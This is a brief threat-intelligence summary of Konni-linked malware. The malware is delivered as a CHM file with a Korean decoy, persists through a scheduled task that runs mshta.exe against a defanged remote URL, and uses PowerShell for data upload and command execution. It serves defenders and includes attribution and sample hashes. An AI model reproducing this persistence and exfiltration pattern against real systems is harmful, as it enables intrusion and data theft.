Konni-related malware was distributed as NService_youngji057.rar and executed through a Windows CHM file that showed a Korean-language decoy requesting a seal certificate and stamped power of attorney. The CHM embedded HTML used the Windows Help ActiveX shortcut object to create a ChromeBrowserUpdate scheduled task that launched mshta.exe against hxxp://goodmarket(.)or(.)kr/admin/sms/3(.)html every 10 minutes. The follow-on HTA and PowerShell logic contacted goodmarket(.)or(.)kr/admin/sms/net(.)php with host and username data, downloaded or uploaded files in chunks, and used obfuscated PowerShell functions for command execution and staging. The source associates Konni with North Korea-linked Thallium and APT37 activity, notes Kimsuky as a possible connection, and provides MD5, SHA-1, and SHA-256 hashes for the CHM sample.